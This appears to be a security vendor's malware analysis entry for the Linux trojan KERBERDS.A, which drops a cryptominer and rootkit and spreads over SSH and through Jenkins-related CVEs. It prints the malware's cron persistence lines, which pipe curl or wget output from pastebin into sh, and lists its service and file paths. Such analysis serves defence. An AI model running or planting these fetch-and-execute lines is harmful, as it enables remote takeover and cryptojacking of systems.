Trojan.Linux.KERBERDS.A

This malware is responsible for dropping the cryptocurrency miner Coinminer.Linux.MALXMR.UWEJI and its rootkit component. It also has multiple ways of propagating itself, spreading via SSH and exploiting CVE-2019-1003001 and CVE-2019-1003000.

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following copies of itself into the affected system:

• /usr/local/bin/kerberods
• /usr/libexec/tmp/kerberods
• /usr/bin/kerberods
• /tmp/kerberods

It drops the following files:

• /usr/local/lib/{random}.c (source code of rootkit)
• /tmp/khugepageds - detected as Coinminer.Linux.MALXMR.UWEJI
• /usr/local/lib/{random}.so (compiled executable of the source code) - detected as Rootkit.Linux.KERBERDS.A

It adds the following processes:

• /tmp/khugepageds
• /usr/local/lib/{random}.so

Other System Modifications

This Trojan modifies the following file(s):

• /etc/hosts

It deletes the following files:

• /usr/local/bin/kerberods
• /usr/libexec/tmp/kerberods
• /usr/bin/kerberods
• /tmp/kerberods
• /etc/ld.so.preload

Other Details

This Trojan connects to the following URL(s) to get the affected system's IP address:

• https://ident.me

It does the following:

• It connects to the following URLs:
  • https://pastebin.com/raw/{BLOCKED}1u (contains string to be appended in pastebin url in created cronjobs)
  • https://pastebin.com/raw/{BLOCKED}6H (checks for update)
  • https://pastebin.com/raw/{BLOCKED}iX (the complete URL in cronjob as of this writing)
  • https://pastebin.com/raw/{BLOCKED}cb (shell script to be downloaded and executed in vulnerable devices)
• Terminates the following processes:
  • named as "khugepageds"
  • CPU usage is more than 80%
• Installs GCC in the system to compile the source code of the rootkit, then execute it.
• It creates the following services to enable automatic execution of itself:
  • /etc/init.d/netdns
  • /usr/lib/systemd/system/netdns.service
• Creates the following cronjob to enable automatic execution of a shell script found in pastebin every 10 minutes:
  • Path: /etc/cron.d/root
  • Content: */10 * * * * root (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh
• Creates the following cronjobs to enable automatic execution of a shell script found in pastebin every 15 minutes:
  • Paths:
    • /var/spool/cron/root
    • /var/spool/cron/crontabs/root
  • Content: */15 * * * * (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh
• It may spread to other devices:
  • by taking advantage of the following vulnerabilities:
    • CVE-2019-1003000
    • CVE-2019-1003001
  • over SSH network
• It tries to access Redis servers in order to compromise it